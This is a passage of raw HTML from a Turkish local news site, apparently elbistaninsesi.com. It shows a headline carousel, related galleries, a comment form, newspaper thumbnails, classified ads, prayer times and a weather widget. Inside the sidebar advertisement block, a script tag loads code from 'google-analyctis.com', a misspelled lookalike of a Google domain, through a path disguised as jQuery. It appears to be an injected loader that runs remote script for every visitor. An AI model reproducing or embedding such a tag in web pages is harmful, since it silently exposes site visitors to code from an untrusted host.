</div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/din-gorevlilerinden-anlamli-bagis-h69422.html" title="Din görevlilerinden anlamlı bağış"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/din_gorevlilerinden_anlamli_bagis_h69422_9f268.jpg" alt="Din görevlilerinden anlamlı bağış" /> <div class="carousel-caption"> <h2> <span style="font-size:">Din görevlilerinden anlamlı bağış</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-saticilari-cekici-beklerken-polisi-karsilarinda-buldu-h69421.html" title="Uyuşturucu satıcıları çekici beklerken polisi karşılarında buldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/03/uyusturucu_saticilari_cekici_beklerken_polisi_karsilarinda_buldu_h69421_0433d.jpg" alt="Uyuşturucu satıcıları çekici beklerken polisi karşılarında buldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uyuşturucu satıcıları çekici beklerken polisi karşılarında buldu</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Park+Fizyo%E2%80%99dan+a%C4%9Fr%C4%B1lara+GTOS+terapi+%C3%A7%C3%B6z%C3%BCm%C3%BC" title="Park Fizyo’dan Ağrılara GTOS Terapi çözümü haberleri">Park Fizyo’dan Ağrılara GTOS Terapi çözümü</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(69447);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="69447" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="d76436f7b1f4c7eecd51057454e1f41aa26dc205" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/park-fizyodan-agrilara-gtos-terapi-cozumu-h69447.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye-gazetesi" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/turkiye-gazetesi.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/aydinlik-gazetesi" title="Aydınlık" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2021-03-06//thumbs-150/aydinlik-gazetesi.jpg" alt="Aydınlık"/></div> <p>Aydınlık</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/250-bin-tllik-ziynet-esyasi-calan-kadin-tutuklandi-h69448.html" title="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/250_bin_tllik_ziynet_esyasi_calan_kadin_tutuklandi_h69448_a4060.jpeg" alt="250 bin TL’lik ziynet eşyası çalan kadın tutuklandı" /> <span>250 bin TL’lik ziynet eşyası çalan kadın tutuklandı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasli-sehidin-cenaze-namazini-dayisi-kildirdi-h69446.html" title="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/kahramanmarasli_sehidin_cenaze_namazini_dayisi_kildirdi_h69446_4483e.jpg" alt="Kahramanmaraşlı şehidin cenaze namazını dayısı kıldırdı" /> <span>Kahramanmaraşlı şehidin cenaze namazını dayısı...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/sehit-astsubay-nazmi-yilmaz-son-yolculuguna-ugurlandi-h69445.html" title="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/sehit_astsubay_nazmi_yilmaz_son_yolculuguna_ugurlandi_h69445_ac540.jpg" alt="Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı" /> <span>Şehit Astsubay Nazmi Yılmaz, son yolculuğuna uğurlandı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ozel-yildiz-koleji-bursluluk-sinavi-yapacak-h69444.html" title="Özel Yıldız Koleji bursluluk sınavı yapacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/ozel_yildiz_koleji_bursluluk_sinavi_yapacak_h69444_97e68.jpg" alt="Özel Yıldız Koleji bursluluk sınavı yapacak" /> <span>Özel Yıldız Koleji bursluluk sınavı yapacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/minik-aysenin-hayatini-degistiren-ameliyat-h69443.html" title="Minik Ayşe’nin hayatını değiştiren ameliyat"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/minik_aysenin_hayatini_degistiren_ameliyat_h69443_1e62b.jpg" alt="Minik Ayşe’nin hayatını değiştiren ameliyat" /> <span>Minik Ayşe’nin hayatını değiştiren ameliyat</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bolgedeki-endustriyel-madenler-icin-ihalar-devrede-h69442.html" title="Bölgedeki endüstriyel madenler için İHA’lar devrede"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/bolgedeki_endustriyel_madenler_icin_ihalar_devrede_h69442_612d0.jpg" alt="Bölgedeki endüstriyel madenler için İHA’lar devrede" /> <span>Bölgedeki endüstriyel madenler için İHA’lar...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-dunya-kadinlar-gunu-mesaji-h69441.html" title="Kaymakam Demir’den Dünya Kadınlar Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/kaymakam_demirden_dunya_kadinlar_gunu_mesaji_h69441_d0059.jpg" alt="Kaymakam Demir’den Dünya Kadınlar Günü mesajı" /> <span>Kaymakam Demir’den Dünya Kadınlar Günü mesajı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-genclerle-celik-comak-oynadi-h69440.html" title="Kaymakam, gençlerle çelik-çomak oynadı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/03/kaymakam_genclerle_celik_comak_oynadi_h69440_6ebc4.jpg" alt="Kaymakam, gençlerle çelik-çomak oynadı" /> <span>Kaymakam, gençlerle çelik-çomak oynadı</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13587.html" title="Satılık daire 2+1" >Satılık daire 2+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13587.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/fb30d740396d87d9a6e92bbb4def3a11c2d8767b.jpg" alt="Satılık daire 2+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/mavi-soft-reklam-elbistanisdunyasicom-bayan-elema-13581.html" title="Mavi soft reklam elbistanisdunyasi.com bayan elema" >Mavi soft reklam elbistanisdunyasi.com bayan elema</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/mavi-soft-reklam-elbistanisdunyasicom-bayan-elema-13581.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Mavi soft reklam elbistanisdunyasi.com bayan elema" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-13579.html" title="Kahve deposu" >Kahve deposu</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-13579.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/eaa6e6c34433cb69c98ce9ae5ebe4837e64ef475.jpg" alt="Kahve deposu" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ceviz-asilama-13576.html" title="CEVİZ AŞILAMA" >CEVİZ AŞILAMA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ceviz-asilama-13576.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="CEVİZ AŞILAMA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-yardimci-eleman-13575.html" title="BAYAN YARDIMCI ELEMAN" >BAYAN YARDIMCI ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-yardimci-eleman-13575.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="BAYAN YARDIMCI ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/on-muhasebeden-arayan-bayan-eleman-13567.html" title="Ön muhasebeden arayan bayan eleman" >Ön muhasebeden arayan bayan eleman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/on-muhasebeden-arayan-bayan-eleman-13567.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Ön muhasebeden arayan bayan eleman" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13560.html" title="Satılık arsa" >Satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13560.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/241709afff59565ec81e2418501d53607324f91d.jpg" alt="Satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-elaman-13558.html" title="Bayan elaman" >Bayan elaman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-elaman-13558.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bayan elaman" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13553.html" title="Bayan eleman" >Bayan eleman</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13553.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bayan eleman" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13548.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13548.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/894273f5cb3db45e37e0a4e093eb412a8af8a1f0.jpg" alt="Satılık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13545.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-13545.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/fe526005fcad9c1ba7cbbe8bd4f5c33d212e13b0.jpg" alt="Satılık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-elemanlar-13544.html" title="BAYAN ELEMANLAR" >BAYAN ELEMANLAR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-elemanlar-13544.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/44a6f2691bc6ee117f16d1d9fa74f3228c3c0b10.jpg" alt="BAYAN ELEMANLAR" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13539.html" title="ÖZEL DERS VERİLİR" >ÖZEL DERS VERİLİR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13539.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÖZEL DERS VERİLİR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13536.html" title="Satılık daire 2+1" >Satılık daire 2+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-21-13536.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/4f6e11e2c57cac58f54ed089b662cef73ed5ad6a.jpg" alt="Satılık daire 2+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13528.html" title="Satılık arsa" >Satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-13528.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a61db92f8dc7623758199b01fa7fbdb1efa4e942.jpg" alt="Satılık arsa" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">40.6B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">98</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:30</td> <td>06:50</td> <td>12:49</td> <td>16:03</td> <td>18:37</td> <td>19:52</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/is-makinesine-carpan-hafif-ticari-aracin-surucusu-hayatini-kaybetti-h69295.html" title="İş makinesine çarpan hafif ticari..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/is_makinesine_carpan_hafif_ticari_aracin_surucusu_hayatini_kaybetti_h69295_0a153.jpg" alt="İş makinesine çarpan hafif ticari..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/is-makinesine-carpan-hafif-ticari-aracin-surucusu-hayatini-kaybetti-h69295.html" title="" ><span class="en-hit">1.</span> <strong>İş makinesine çarpan hafif 